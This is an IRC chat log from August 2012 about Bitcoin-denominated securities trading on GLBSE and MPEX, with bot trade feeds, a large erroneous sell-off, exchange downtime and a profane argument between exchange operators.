[GLBSE] [TYGRR.BOND-P] 5 @ 0.65 = 3.25 BTC [+] Aug 24 21:07:32 [GLBSE] [ASICMINER] 16 @ 0.09 = 1.44 BTC [-] Aug 24 21:08:18 [GLBSE] [ASICMINER] 25 @ 0.09 = 2.25 BTC [-] Aug 24 21:09:20 nefario: so things are going well now for the site? Aug 24 21:09:38 bug fixed Aug 24 21:10:05 good to hear Aug 24 21:10:08 now to change the order cleanup system Aug 24 21:10:13 so instead of cancelling orders Aug 24 21:10:19 it reduces the quantity Aug 24 21:10:26 that would be nice Aug 24 21:11:21 Current P/E based on all-time performance: 8.79x Aug 24 21:11:21 Current P/E based on past 30 days performance: 4.72x Aug 24 21:11:31 ok, evoorhees came up with some pretty interesting numbers. Aug 24 21:12:15 [GLBSE] [FOO.PPPPT] 10 @ 0.65 = 6.5 BTC [-] Aug 24 21:13:07 for S.DICE? Aug 24 21:13:35 [MPEX] [S.MPOE] 24300 @ 0.00039417 = 9.5783 BTC [-] Aug 24 21:13:36 [MPEX] [S.MPOE] 23100 @ 0.00039265 = 9.0702 BTC [-] Aug 24 21:14:37 yeah Aug 24 21:14:51 [GLBSE] [GIGAMINING] 1 @ 0.9788 BTC [+] Aug 24 21:14:58 apparently ipo announcement brought a lot more business. Aug 24 21:15:27 [GLBSE] [FPGAMINING] 46 @ 0.9 = 41.4 BTC [+] Aug 24 21:16:51 [GLBSE] [V.HRL] 2 @ 1 = 2 BTC Aug 24 21:20:21 [GLBSE] [BITCOINMINV] 12 @ 0.126 = 1.512 BTC [+] Aug 24 21:21:01 over half of s.dice's first round are bid on already Aug 24 21:21:39 with those numbers... Aug 24 21:22:07 actually haha, #bitcoin-assets will see some trades when the block goes out huh Aug 24 21:22:20 congrats Aug 24 21:23:12 [GLBSE] [TYGRR.BOND-P] 1 @ 0.54 BTC [-] Aug 24 21:26:04 what happens to the remaining s.dice shares from today's round? Are they included in tomorrow's round? Aug 24 21:26:22 [MPEX] [F.GIGA.ETF] 3205 @ 0.00098583 = 3.1596 BTC [-] Aug 24 21:26:23 [MPEX] [F.GIGA.ETF] 5554 @ 0.00098258 = 5.4572 BTC [-] Aug 24 21:27:00 maximian no, they just stay on the book till bought Aug 24 21:27:39 i imagine some people rather than expose their bid prefer to lurk, but you never know. Aug 24 21:28:55 makes sense Aug 24 21:30:33 just to clarify, the 4.72x P/E for the past 30 days wouldn't be far different if we excluded this past week of performance. So if you want to remove the publicity factor from this week, the P/E for the past 30 days is probably in the 5-6x range Aug 24 21:30:57 what was seen cannot be unseen Aug 24 21:31:02 publicity doesn't go away once had :D Aug 24 21:32:04 i guess it'd make sense to exclude it from any growth velocity projections. maybe. Aug 24 21:32:06 True but this week can reasonably be considered an outlier - I don't want people to think that this week is far out of the norm, however. It is fairly in line with the past 30 days of performance Aug 24 21:32:18 yeah Aug 24 21:32:27 im really curious what a print ad campaign does Aug 24 21:32:43 i haven't done any print advertising in > 5 years now. Aug 24 21:33:05 the print ad campaign will be longer term - it'll introduce the normal gambling world to bitcoin. This will have a long-term effect on SD's long term outlook, but I don't think it would cause any sudden surge Aug 24 21:33:24 still, you do measure roi somehiw with it Aug 24 21:33:32 i imagine Aug 24 21:34:30 yeah... if only print had a "click here" button :) Aug 24 21:34:53 i guess it will be quite visible in -otc and on forum tho :p Aug 24 21:34:57 Manly - I want to use some of the money to market bitcoin to the broader world. This is of course always a big objective of mine. Aug 24 21:35:02 mainly* Aug 24 21:35:09 nono, manly worked. Aug 24 21:35:16 hehe Aug 24 21:35:44 hey evoorhees Aug 24 21:35:53 heya Aug 24 21:38:57 [GLBSE] [BDT] 3 @ 1.09 = 3.27 BTC [+] Aug 24 21:42:25 Avg. BTC per Bet 0.56 Aug 24 21:42:32 this is kinda interesting, means rg was a real baller huh. Aug 24 21:43:02 [GLBSE] [GIGAMINING] 1 @ 0.965 BTC [-] Aug 24 21:43:30 ticker Aug 24 21:43:42 ;;ticker Aug 24 21:43:42 Best bid: 10.13001, Best ask: 10.22, Bid-ask spread: 0.08999, Last trade: 10.245, 24 hour volume: 51183, 24 hour low: 9.852, 24 hour high: 10.245 Aug 24 21:46:45 [MPEX] [F.GIGA.ETF] 9300 @ 0.00097825 = 9.0977 BTC [-] Aug 24 21:47:19 looks like P is behind recent orderbook changes Aug 24 21:47:32 P ? Aug 24 21:47:39 pirate? Aug 24 21:47:50 what orderbook changes ? Aug 24 21:48:07 from bearish to bullish Aug 24 21:48:13 !ticker TYGRR.BOND-P Aug 24 21:48:48 some one just bought quite a few coins on gox too, maybe 20k? Aug 24 21:48:50 [GLBSE:TYGRR.BOND-P] [Bid: 0.5] [Ask: 0.68] [Spread: 0.18] [Last: 0.54] [24hVol: 370.2641998] [7dAvg: 0.67569585] Aug 24 21:48:51 [MPEX] [S.MPOE] 11200 @ 0.00039323 = 4.4042 BTC [+] Aug 24 21:48:53 [MPEX] [S.MPOE] 9700 @ 0.0003929 = 3.8111 BTC [-] Aug 24 21:49:16 ya thats about 2x normal volume for that bond huh Aug 24 21:49:48 [GLBSE] [ASICMINER] 1 @ 0.09 BTC [-] Aug 24 21:50:34 mircea_popescu: it recently passed gigamining Aug 24 21:50:40 [GLBSE] [OBSI.HRPT] 40 @ 0.1095 = 4.38 BTC [+] Aug 24 21:51:08 [GLBSE] [OBSI.ABMO] 20 @ 0.08 = 1.6 BTC [-] Aug 24 21:51:14 boonies4u yeah. Aug 24 21:52:32 wowza Aug 24 21:52:34 ;;ticker Aug 24 21:52:34 Best bid: 10.31, Best ask: 10.3834, Bid-ask spread: 0.07340, Last trade: 10.39, 24 hour volume: 60858, 24 hour low: 9.852, 24 hour high: 10.39 Aug 24 21:53:06 hmm, i guess ~13k btc http://bitcoincharts.com/charts/mtgoxUSD#rg2zig15-minztgSzbgBza1gTMAzm1g10za2gTMAzm2g25zi1gMACDzi2gWilliamRzv Aug 24 21:53:33 that thar be a lot o monies Aug 24 21:55:04 damn, just sold like five minutes ago Aug 24 21:55:11 ;;ticker Aug 24 21:55:12 Best bid: 10.4, Best ask: 10.422, Bid-ask spread: 0.02200, Last trade: 10.4, 24 hour volume: 63367, 24 hour low: 9.852, 24 hour high: 10.422 Aug 24 21:55:17 back to 14 ? Aug 24 21:55:42 [GLBSE] [FPGAMINING] 2 @ 0.941 = 1.882 BTC [+] Aug 24 21:56:01 there's still the joker of pirate's holdings Aug 24 21:56:08 is he in bitcoin or usd right now Aug 24 21:56:22 or in mexico Aug 24 21:56:23 [MPEX] [O.BTCUSD.P110T] 5 @ 0.14474517 = 0.7237 BTC [-] Aug 24 21:56:24 [MPEX] [O.BTCUSD.P110T] 6 @ 0.13615187 = 0.8169 BTC [-] Aug 24 21:56:25 [MPEX] [O.BTCUSD.P110T] 7 @ 0.11376472 = 0.7964 BTC [-] Aug 24 21:56:26 [MPEX] [O.BTCUSD.P110T] 602 @ 0.10034315 = 60.4066 BTC [-] Aug 24 21:57:16 >> Forgot to say: mpoe.org, mpoe.biz, mpex.us, mpex.biz among others all point to http://polimedia.us/bitcoin. Aug 24 21:57:20 is this new mircea_popescu ? Aug 24 21:57:25 [GLBSE] [FOO.PPPPT] 10 @ 0.69 = 6.9 BTC [+] Aug 24 21:57:28 not rly. Aug 24 21:57:38 jsut people were so aggitated about domain names for some reason. Aug 24 21:57:52 [GLBSE] [OBSI.HRPT] 7 @ 0.1095 = 0.7665 BTC [+] Aug 24 21:57:54 ;;ticker Aug 24 21:57:54 Best bid: 10.431, Best ask: 10.47987, Bid-ask spread: 0.04887, Last trade: 10.431, 24 hour volume: 64186, 24 hour low: 9.852, 24 hour high: 10.48 Aug 24 21:58:07 i think it's this psychological thing, "i have a domain i am now antrepreneur" or something. Aug 24 21:58:45 i dont care as long as its short Aug 24 21:59:10 'polimedia' is kinda long Aug 24 21:59:13 well... 4 letters. Aug 24 21:59:21 ;;ticker Aug 24 21:59:22 Best bid: 10.431, Best ask: 10.478, Bid-ask spread: 0.04700, Last trade: 10.431, 24 hour volume: 64623, 24 hour low: 9.852, 24 hour high: 10.48 Aug 24 21:59:24 ya, but polimedia is a 5 year old domain that dominates. Aug 24 21:59:54 and Aug 24 21:59:57 when you type it Aug 24 22:00:01 you are not done yet Aug 24 22:00:04 :> Aug 24 22:00:10 you srsly can jsut go mpex.us Aug 24 22:00:16 I WILL! Aug 24 22:00:18 RITE NAO! Aug 24 22:00:19 tho i think most users don't even go to the site Aug 24 22:00:23 or else have booxmarx Aug 24 22:00:49 did you see dead man mp, the movie Aug 24 22:00:54 mmmmno Aug 24 22:01:02 i think you might enjoy it as well Aug 24 22:01:19 i'll add it to the list Aug 24 22:02:37 whoa Aug 24 22:02:38 ;;ticker Aug 24 22:02:39 Best bid: 10.61298, Best ask: 10.613, Bid-ask spread: 0.00002, Last trade: 10.61298, 24 hour volume: 70440, 24 hour low: 9.852, 24 hour high: 10.613 Aug 24 22:02:42 we're exploding here. Aug 24 22:03:02 [MPEX] [S.MPOE] 6800 @ 0.0003929 = 2.6717 BTC [-] Aug 24 22:04:54 [GLBSE] [DMC] 38 @ 0.05199999 = 1.976 BTC [+] Aug 24 22:07:58 ;;ticker Aug 24 22:07:59 Best bid: 10.48041, Best ask: 10.5777, Bid-ask spread: 0.09729, Last trade: 10.6, 24 hour volume: 73103, 24 hour low: 9.852, 24 hour high: 10.6188 Aug 24 22:17:00 [MPEX] [F.GIGA.ETF] 1541 @ 0.00097825 = 1.5075 BTC [-] Aug 24 22:17:02 [MPEX] [F.GIGA.ETF] 7408 @ 0.00099082 = 7.34 BTC [+] Aug 24 22:29:40 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Aug 24 22:35:11 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 24 22:37:44 [GLBSE] [PUREMINING] 5 @ 0.085 = 0.425 BTC [-] Aug 24 22:39:59 [GLBSE] [JTME] 1 @ 0.99 BTC [+] Aug 24 22:43:47 [GLBSE] [OBSI.HRPT] 9 @ 0.1095 = 0.9855 BTC [+] Aug 24 22:47:18 zomg http://www.youtube.com/watch?v=INd39TezErQ&feature=player_embedded Aug 24 22:51:09 [GLBSE] [BIB.PIRATE] 5 @ 0.65 = 3.25 BTC [+] Aug 24 22:51:27 [MPEX] [S.MPOE] 10716 @ 0.0003954 = 4.2371 BTC [+] Aug 24 22:53:25 kakobrekla: Until they get that health bar over ppl in real life, they won't know when to stop shooting Aug 24 22:53:39 heh Aug 24 22:54:53 [GLBSE] [BIB.PIRATE] 5 @ 0.65 = 3.25 BTC [+] Aug 24 22:56:19 [MPEX] [S.MPOE] 13300 @ 0.0003929 = 5.2256 BTC [-] Aug 24 22:56:20 [MPEX] [S.MPOE] 8200 @ 0.00039265 = 3.2197 BTC [-] Aug 24 22:57:29 [GLBSE] [BTC-MINING] 2 @ 0.999 = 1.998 BTC [+] Aug 24 22:59:44 [GLBSE] [FPGAMINING] 2 @ 0.941 = 1.882 BTC [+] Aug 24 23:01:26 what's the 24 hour avg price command ? Aug 24 23:02:53 [GLBSE] [FOO.PPPPT] 10 @ 0.650001 = 6.5 BTC [-] Aug 24 23:05:11 ;;ticker -something Aug 24 23:05:11 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Aug 24 23:05:26 o no. Aug 24 23:05:29 [GLBSE] [ZETA-MINING] 1 @ 0.1699 BTC [-] Aug 24 23:07:06 [GLBSE] [ASICMINER] 80 @ 0.09 = 7.2 BTC [-] Aug 24 23:07:56 [GLBSE] [ASICMINER] 1 @ 0.09 BTC [-] Aug 24 23:13:50 Gamma SatoshiDice Pass Through is up and running :D Aug 24 23:13:59 [GLBSE] [GIGAMINING] 2 @ 0.9788 = 1.9576 BTC [+] Aug 24 23:14:31 got some nice deal Deadterra? Aug 24 23:14:53 o hey, that's good. Aug 24 23:14:54 nice deal? xD Of course I only have nice deals ;) Aug 24 23:15:05 Place you bids ;) Aug 24 23:15:07 DeaDTerra wghat about the peoplebidding like10x the price ?! Aug 24 23:15:15 All fake bids... Aug 24 23:15:28 they didn't have the Bitcoins accessable so they were automatically cancelled :P Aug 24 23:15:39 :p Aug 24 23:15:43 ;;bids 15 Aug 24 23:15:45 There are currently 0 bitcoins demanded at or over 15.0 USD, worth 0.0 USD in total. Aug 24 23:15:49 ;;asks 15 Aug 24 23:15:51 There are currently 107331.49 bitcoins offered at or under 15.0 USD, worth 1327941.11918 USD in total. Aug 24 23:16:07 ;;asks 11 Aug 24 23:16:09 There are currently 31555.646 bitcoins offered at or under 11.0 USD, worth 338842.686739 USD in total. Aug 24 23:20:41 [MPEX] [O.BTCUSD.P110N] 1 @ 0.29482106 BTC [+] Aug 24 23:22:24 [MPEX] [F.GIGA.ETF] 11800 @ 0.00099001 = 11.6821 BTC [-] Aug 24 23:22:25 [MPEX] [F.GIGA.ETF] 3760 @ 0.00099082 = 3.7255 BTC [+] Aug 24 23:24:31 [GLBSE] [DMC] 1 @ 0.05199999 BTC [+] Aug 24 23:33:31 [MPEX] [O.BTCUSD.P100T] 1 @ 0.06706575 BTC [-] Aug 24 23:38:40 [MPEX] [F.GIGA.ETF] 865 @ 0.00100197 = 0.8667 BTC [+] Aug 24 23:39:38 !ticker ABM Aug 24 23:39:39 Invalid ticker. Aug 24 23:39:52 ??? glbse down Aug 24 23:45:18 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.06645947 = 66.4595 BTC [-] Aug 24 23:45:20 [MPEX] [O.BTCUSD.P090T] 1000 @ 0.05351401 = 53.514 BTC [-] Aug 24 23:46:37 yes Aug 24 23:54:11 [MPEX] [S.MPOE] 42998 @ 0.00039306 = 16.9008 BTC [+] Aug 24 23:54:13 [MPEX] [S.MPOE] 19102 @ 0.00039265 = 7.5004 BTC [-] Aug 24 23:55:16 22:48.37 ( @neofutur ) (04:57) <@MagicalTu> we have 350k moving as I talk Aug 24 23:55:16 22:48.37 ( @neofutur ) (04:58) <@MagicalTu> and 50k which should be credited soon (pending since 08/19/2012) Aug 24 23:57:35 [MPEX] [S.MPOE] 298 @ 0.00039265 = 0.117 BTC [-] Aug 24 23:57:36 [MPEX] [S.MPOE] 29900 @ 0.00039247 = 11.7349 BTC [-] Aug 24 23:57:37 [MPEX] [S.MPOE] 27851 @ 0.0003922 = 10.9232 BTC [-] Aug 24 23:57:38 [MPEX] [S.MPOE] 32307 @ 0.00039189 = 12.6608 BTC [-] Aug 24 23:57:39 what's that about kakobrekla ? Aug 24 23:57:39 [MPEX] [S.MPOE] 48210 @ 0.00038903 = 18.7551 BTC [-] Aug 24 23:57:40 [MPEX] [S.MPOE] 50001 @ 0.00038855 = 19.4279 BTC [-] Aug 24 23:57:41 [MPEX] [S.MPOE] 43195 @ 0.00038853 = 16.7826 BTC [-] Aug 24 23:57:42 [MPEX] [S.MPOE] 45700 @ 0.00038795 = 17.7293 BTC [-] Aug 24 23:57:43 [MPEX] [S.MPOE] 38500 @ 0.00038695 = 14.8976 BTC [-] Aug 24 23:57:45 [MPEX] [S.MPOE] 42700 @ 0.00038686 = 16.5189 BTC [-] Aug 24 23:57:46 [MPEX] [S.MPOE] 32708 @ 0.00038672 = 12.6488 BTC [-] Aug 24 23:57:46 [MPEX] [S.MPOE] 49600 @ 0.00038672 = 19.1813 BTC [-] Aug 24 23:57:47 [MPEX] [S.MPOE] 35956 @ 0.00038671 = 13.9045 BTC [-] Aug 24 23:57:48 [MPEX] [S.MPOE] 1191 @ 0.00038652 = 0.4603 BTC [-] Aug 24 23:57:49 [MPEX] [S.MPOE] 2200 @ 0.00038651 = 0.8503 BTC [-] Aug 24 23:57:50 [MPEX] [S.MPOE] 44300 @ 0.00038639 = 17.1171 BTC [-] Aug 24 23:57:51 [MPEX] [S.MPOE] 5200 @ 0.00038638 = 2.0092 BTC [-] Aug 24 23:57:52 [MPEX] [S.MPOE] 28637 @ 0.00038638 = 11.0648 BTC [-] Aug 24 23:57:53 [MPEX] [S.MPOE] 5147 @ 0.00038634 = 1.9885 BTC [-] Aug 24 23:57:54 [MPEX] [S.MPOE] 62200 @ 0.00038632 = 24.0291 BTC [-] Aug 24 23:57:55 [MPEX] [S.MPOE] 37000 @ 0.00038629 = 14.2927 BTC [-] Aug 24 23:57:56 [MPEX] [S.MPOE] 62300 @ 0.00038611 = 24.0547 BTC [-] Aug 24 23:57:57 [MPEX] [S.MPOE] 54415 @ 0.00038575 = 20.9906 BTC [-] Aug 24 23:57:58 [MPEX] [S.MPOE] 52500 @ 0.00038547 = 20.2372 BTC [-] Aug 24 23:57:59 [MPEX] [S.MPOE] 41300 @ 0.00038541 = 15.9174 BTC [-] Aug 24 23:58:00 [MPEX] [S.MPOE] 24810 @ 0.00038517 = 9.5561 BTC [-] Aug 24 23:58:01 [MPEX] [S.MPOE] 33300 @ 0.00038473 = 12.8115 BTC [-] Aug 24 23:58:02 [MPEX] [S.MPOE] 16899 @ 0.0003847 = 6.501 BTC [-] Aug 24 23:58:03 [MPEX] [S.MPOE] 38200 @ 0.00038442 = 14.6848 BTC [-] Aug 24 23:58:04 [MPEX] [S.MPOE] 49600 @ 0.00038423 = 19.0578 BTC [-] Aug 24 23:58:04 [MPEX] [S.MPOE] 20400 @ 0.00038412 = 7.836 BTC [-] Aug 24 23:58:05 [MPEX] [S.MPOE] 63600 @ 0.00038408 = 24.4275 BTC [-] Aug 24 23:58:06 [MPEX] [S.MPOE] 1000 @ 0.00038408 = 0.3841 BTC [-] Aug 24 23:58:07 [MPEX] [S.MPOE] 50300 @ 0.00038403 = 19.3167 BTC [-] Aug 24 23:58:08 [MPEX] [S.MPOE] 1800 @ 0.00038396 = 0.6911 BTC [-] Aug 24 23:58:09 [MPEX] [S.MPOE] 800 @ 0.00038296 = 0.3064 BTC [-] Aug 24 23:58:10 [MPEX] [S.MPOE] 59800 @ 0.00038274 = 22.8879 BTC [-] Aug 24 23:58:11 [MPEX] [S.MPOE] 2100 @ 0.00038268 = 0.8036 BTC [-] Aug 24 23:58:12 [MPEX] [S.MPOE] 21279 @ 0.00037881 = 8.0607 BTC [-] Aug 24 23:58:13 [MPEX] [S.MPOE] 4300 @ 0.00037614 = 1.6174 BTC [-] Aug 24 23:58:13 [MPEX] [S.MPOE] 45811 @ 0.0003724 = 17.06 BTC [-] Aug 24 23:58:15 [MPEX] [S.MPOE] 40800 @ 0.00037056 = 15.1188 BTC [-] Aug 24 23:58:16 [MPEX] [S.MPOE] 3800 @ 0.00035264 = 1.34 BTC [-] Aug 24 23:58:17 [MPEX] [S.MPOE] 37216 @ 0.00034885 = 12.9828 BTC [-] Aug 24 23:58:18 [MPEX] [S.MPOE] 20624 @ 0.00034759 = 7.1687 BTC [-] Aug 24 23:58:19 [MPEX] [S.MPOE] 1100 @ 0.00034315 = 0.3775 BTC [-] Aug 24 23:58:20 [MPEX] [S.MPOE] 9300 @ 0.00034254 = 3.1856 BTC [-] Aug 24 23:58:21 [MPEX] [S.MPOE] 60400 @ 0.00034229 = 20.6743 BTC [-] Aug 24 23:58:22 [MPEX] [S.MPOE] 2900 @ 0.00033685 = 0.9769 BTC [-] Aug 24 23:58:22 [MPEX] [S.MPOE] 57030 @ 0.0003328 = 18.9796 BTC [-] Aug 24 23:58:23 [MPEX] [S.MPOE] 20800 @ 0.00033166 = 6.8985 BTC [-] Aug 24 23:58:25 [MPEX] [S.MPOE] 21789 @ 0.00032871 = 7.1623 BTC [-] Aug 24 23:58:25 [MPEX] [S.MPOE] 24924 @ 0.00032816 = 8.1791 BTC [-] Aug 24 23:58:26 [MPEX] [S.MPOE] 46623 @ 0.00032395 = 15.1035 BTC [-] Aug 24 23:58:27 [MPEX] [S.MPOE] 29900 @ 0.00032361 = 9.6759 BTC [-] Aug 24 23:58:28 [MPEX] [S.MPOE] 3571 @ 0.00028 = 0.9999 BTC [-] Aug 24 23:58:30 [MPEX] [S.MPOE] 947016 @ 0.0001 = 94.7016 BTC [-] Aug 24 23:58:30 [MPEX] [S.MPOE] 664892 @ 0.000035 = 23.2712 BTC [-] Aug 24 23:58:38 aahah wtf. Aug 24 23:58:56 huh Aug 24 23:59:27 what in the sam hell Aug 24 23:59:38 hm Aug 24 23:59:42 orderbook is now empty eh Aug 24 23:59:44 i would guess somebody made a typo Aug 24 23:59:45 lol Aug 25 00:00:10 which man... musta hurt. Aug 25 00:00:14 whats the total btc Aug 25 00:00:32 liek a coupla hundred maybe ? Aug 25 00:01:24 ouch Aug 25 00:01:32 mircea_popescu: someone wants out Aug 25 00:01:37 !ticker S.MPOE Aug 25 00:01:39 [MPEX:S.MPOE] 1day: 0.000035 / 0.00029989 / 0.0004 (5892150 shares, 1,767.01 BTC), 30day: 0.000035 / 0.00036086 / 0.00041457 (66456721 shares, 23,981.68 BTC) Aug 25 00:01:57 lol 0.000035 / 0.0004 that's cute. Aug 25 00:02:21 nah nefario , if they wanted out could have taken their time. someone sold 10x as many as they meant to. Aug 25 00:03:10 not really much of a loss except for those 1.6mn at the end. Aug 25 00:03:22 .py 1600000 * 0.00035 Aug 25 00:03:23 560.0 Aug 25 00:03:27 bout 500 btc. Aug 25 00:08:48 so in the end deadterra sold nothing ? or am i misreading this https://glbse.com/asset/view/GSDPT Aug 25 00:09:13 nm, glbse down again. Aug 25 00:09:32 down and as far as I know no he sold nothing yet Aug 25 00:12:54 I am disappoint. Aug 25 00:13:19 i tell you, if after all the hee-haw on the forums glbse manages to sell 10 btc's worth... Aug 25 00:13:22 it's gonna be sad. Aug 25 00:17:23 Wow, there a lot of happy s.mpoe bidders today Aug 25 00:17:56 poor smickles. Aug 25 00:18:03 when he wakes up and sees this he's gonna seethe Aug 25 00:20:20 [MPEX] [S.MPOE] 7500 @ 0.00038342 = 2.8757 BTC [+] Aug 25 00:33:06 [MPEX] [S.MPOE] 900 @ 0.00038336 = 0.345 BTC [-] Aug 25 00:48:18 [MPEX] [S.BVPS] 142 @ 0.00346064 = 0.4914 BTC [+] Aug 25 00:49:07 [MPEX] [S.MPOE] 23200 @ 0.00038342 = 8.8953 BTC [+] Aug 25 00:50:33 whats the score with glbse? Aug 25 00:50:40 down Aug 25 00:54:54 Apparently there is a major bug being closed Aug 25 00:54:58 so its for the best it seems Aug 25 01:04:40 heh Aug 25 01:04:46 i caught it taht time Aug 25 01:04:47 :D Aug 25 01:05:01 at least a little :/ Aug 25 01:05:05 how low did that go? Aug 25 01:05:26 .0001? really? Aug 25 01:05:35 :o Aug 25 01:06:03 i should'a had more wher i bid at :( Aug 25 01:07:16 What bug? Aug 25 01:07:38 And that 0.0001 might get reversed, whatever it was Aug 25 01:08:27 ah man, well, it turns out i only had a 1btc wort of a bid a .0028 Aug 25 01:08:57 BTC-Mining: the .0001 on s.mpoe? Aug 25 01:09:11 oh, MPOE Aug 25 01:09:33 waht .0001 are you talking about *shivers* Aug 25 01:09:51 [MPEX] [S.MPOE] 4700 @ 0.00038342 = 1.8021 BTC [+] Aug 25 01:10:38 BTC-Mining: what happened to kraken on glbse (when it was up)? Aug 25 01:10:52 [MPEX] [S.MPOE] 200 @ 0.00038537 = 0.0771 BTC [+] Aug 25 01:10:54 [MPEX] [S.MPOE] 8900 @ 0.00038503 = 3.4268 BTC [-] Aug 25 01:12:31 So Aug 25 01:12:40 When is it going to be up again Aug 25 01:15:44 It's selling Aug 25 01:15:55 Not sure we're it's at right now. Aug 25 01:17:05 I saw a bunch at .1 then went to buy and they weren't there Aug 25 01:17:19 .01 Aug 25 01:26:05 They're sold at 0.01 Aug 25 01:26:53 It doesn't change the percent returned, but should allow to reinvest in full (or almost) each week if wanted. Aug 25 01:28:27 oh, well that sucks :) Aug 25 01:28:44 I prefer more shares for less than forcing a full bitcoin per share. Aug 25 01:29:31 so glbse still down ? Aug 25 01:29:36 seems so Aug 25 01:29:45 did the deadterra thing happen? Aug 25 01:29:50 obviously it's a lot easier to use. Aug 25 01:29:55 no, it got killed. Aug 25 01:30:02 really? Aug 25 01:30:04 what deadterra thing? Aug 25 01:30:04 exchanfge has to be up for things to happen Aug 25 01:30:05 well ? Aug 25 01:30:12 i suppose Aug 25 01:30:20 but to give up entirely? Aug 25 01:30:35 BTC-Mining deadterra was going to try and offer a pass-through for s.dice on that pathetic excuse of a dysfunctional thing which they insist on the forum is "the standard" Aug 25 01:30:46 it collected ~100 btc in fake bids which wiped when the guy put the asset out Aug 25 01:30:53 and that was during the half hour the site was up today. Aug 25 01:31:06 and im going to shoot the next forum fuckwit that even dares to not sing the praises of mpex. Aug 25 01:31:12 just on general principle. Aug 25 01:31:16 [MPEX] [S.MPOE] 3800 @ 0.00038336 = 1.4568 BTC [-] Aug 25 01:31:35 i'm not even an exchange and i'm 'passing thru' more than 100 btc ??! Aug 25 01:31:40 yes. Aug 25 01:31:53 waht happend to that forum spirit? Aug 25 01:31:58 because "it not being on glbse is a blemish" Aug 25 01:32:00 fucktards. Aug 25 01:32:11 they deserve their pirate bonds. for srsly. Aug 25 01:32:27 sing the praises of mpex? Fuck, it might be good functional wise, but any professional platform should have great user interface AND great security/performance Aug 25 01:32:51 it's the exchange, not the brokerage Aug 25 01:33:03 GLBSE/Mpex both have one side of the thing each, UI or performance. Both seems secure. Aug 25 01:33:24 Not hard to be fast when hardly anyone is using it Aug 25 01:33:25 Hopefully in the future, both of you can have UI + performance. Aug 25 01:33:39 And fuck this country Aug 25 01:33:56 BTC-Mining: i'll add the ui to mpex Aug 25 01:33:59 BTC-Mining get out. seriously. exchange down ? WHAT ? Aug 25 01:34:03 i'm calling it smex Aug 25 01:34:14 it will be my brokerage site Aug 25 01:34:14 nefario don't even start Aug 25 01:34:17 smeg? Aug 25 01:34:23 your noobs need about a month to get my daily volume. Aug 25 01:34:30 and who told you it;'s ok to have bugs in production software ? Aug 25 01:34:36 mircea_popescu: you can roll your lips on the glory of my cokc Aug 25 01:34:38 cock Aug 25 01:34:47 tell me rthat. what school did you go wjere they said "production software has bugs in it" Aug 25 01:34:53 ... are two exchange owners really fighting now? Aug 25 01:34:55 buncha crap. Aug 25 01:34:56 yes. Aug 25 01:35:03 looked like it Aug 25 01:35:06 Im in a pissy mood ATM Aug 25 01:35:12 get of the fucken internet and come back when you can provide something that works. Aug 25 01:35:18 (my comment to BTC-Mining) Aug 25 01:36:01 ** shudder ** Aug 25 01:36:24 mircea, you're rolling no new features for mpex, at least try and show you can do it before criticizing. Aug 25 01:36:38 dude. new features ?\ Aug 25 01:36:48 queue ordering ? he's implementing my features, six months late. Aug 25 01:36:51 get out. srsly. Aug 25 01:36:54 mine work. Aug 25 01:37:39 ciuciu: i think he still has you on ignore Aug 25 01:38:13 This update happens to be implemented on Mpex. But there's not that many features as far as I know on Mpex. Aug 25 01:38:21 BTC-Mining such as. Aug 25 01:38:42 are you asking BTC-Mining for a feature request? Aug 25 01:38:43 I'm saying you could at least try to add new features and show you can do it without any bugs before criticizing. Aug 25 01:39:02 ... Aug 25 01:39:09 It's NOT ok to have bugs in production software, I'll have to approve that. Aug 25 01:39:11 mpex has been running without as much as 5 minutes of downtime since launch Aug 25 01:39:18 what part of that woudl you improve upon ? Aug 25 01:39:37 and it's not even that i have a problem with the guy trying. Aug 25 01:39:40 he's trying, great. Aug 25 01:39:44 it's the forum idiots that get my goat. Aug 25 01:39:49 Features! UI! Aug 25 01:40:00 [MPEX] [F.GIGA.ETF] 7700 @ 0.00099504 = 7.6618 BTC [-] Aug 25 01:40:07 dude you say features like it's some sort of the grail. what features ? Aug 25 01:40:54 Feeatures like better graphs, better account summary, login with 2 step auth Aug 25 01:41:17 mircea: order history would be nice Aug 25 01:41:20 See how you can handle the amount of traffic then. Aug 25 01:41:32 BTC-Mining you have any ideea how much traffic i handle ? Aug 25 01:41:40 cmon, for my curiosity, spout a figure. Aug 25 01:41:51 he is the 4chan of romainia, or some such Aug 25 01:41:53 maximian order history, how you mean ? Aug 25 01:42:00 smickles forget that, i just mean /bitcoin/ Aug 25 01:42:06 Considering the current simple interface, probably a lot. Aug 25 01:42:07 oh Aug 25 01:42:08 Get a JSON dump of my transaction history Aug 25 01:42:17 But there's not so many people using Mpex. Aug 25 01:42:23 maximian you get that in a stat neh ? Aug 25 01:42:31 BTC-Mining you really believe that ? Aug 25 01:42:48 ciuciu: reported whowhatnow? Aug 25 01:43:02 mircea: not the complete history - I have to keep track of it myself Aug 25 01:43:26 maximian you get the history since last STAT, right. the ideea kinda is that accounting is done by client. Aug 25 01:43:36 I'm saying if you'd improve the UI, you'd bring more people to MPEX and at the same time need more processing power for each user. Aug 25 01:43:57 BTC-Mining this is a non-argument. Aug 25 01:44:19 mircea_popescu: Am i missing something, or are you saying mpex is an EXCHANGE, not a BROKER? Aug 25 01:44:31 well yes it's an exchange Aug 25 01:44:52 broker/exchange/accountant/fluffer Aug 25 01:44:57 that's what I want Aug 25 01:45:03 lol Aug 25 01:45:10 all run by one button Aug 25 01:45:42 maximian but anyway, you're not supposed to throwaway your stats. Aug 25 01:45:48 you're supposed to keep em somewhere. Aug 25 01:46:00 sort of like receipts. Aug 25 01:46:13 when you do your accounting, you pull out your receipts and add them up. Aug 25 01:46:24 mircea: right, but that's not immediately obvious, and not what most people would expect Aug 25 01:46:41 ya i guess it depends what they're used to, but prolly most wouldn't. Aug 25 01:46:44 They'd expect the platform to generate it for them. Aug 25 01:46:57 BTC-Mining so ti can pull a dwolla on them Aug 25 01:47:00 and change their accounts. Aug 25 01:47:47 anyone know what kind of data you get with a seat on NYSE? Aug 25 01:47:57 yes. exactly one, it would seem, me. Aug 25 01:47:58 I mean, you would get more people. The only reason you get large volumes and big investors taking the time to do it is because of the quality of companies you allow on the platform. Plus the options. Aug 25 01:48:02 guess oh guess. Aug 25 01:48:21 BTC-Mining first and foremost the security, actually. that was there before the rest. Aug 25 01:48:40 Aye. But options are good too. Aug 25 